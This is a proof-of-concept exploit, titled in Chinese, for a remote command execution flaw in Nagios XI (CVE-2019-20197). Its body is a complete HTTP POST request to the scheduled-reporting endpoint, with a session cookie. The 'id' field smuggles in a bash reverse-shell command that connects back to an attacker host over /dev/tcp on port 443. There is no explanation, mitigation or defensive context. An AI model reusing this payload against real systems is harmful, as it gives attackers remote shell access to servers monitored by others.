Nagios XI远程命令执行漏洞(CVE-2019-20197)

POC:

POST /nagiosxi/includes/components/scheduledreporting/schedulereport.php HTTP/1.1

Host: x.x.x.x

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: nagiosxi=6l8idvsacv6ejiandm0ospub51

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 466

nsp=81ee683a90099cd27011d419da672cfc889d02903663742ccc8b1810c67f9784&update=1&id=a";bash -i >%26 /dev/tcp/x.x.x.x/443
0>%261;&type=&url=%2Fnagiosxi%2Freports%2Feventlog.php%3Fsearch%3D%26reportperiod%3Dlast24hours%26startdate%3D%26enddate%3D&wurl=&userid=0 &length=0&sendonce=0&name=Eventlog+Report&frequency=Daily&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&attachments%5Bpdf%5D=on&recip ients=root%40localhost&subject=Eventlog+Report&body=&updateButton=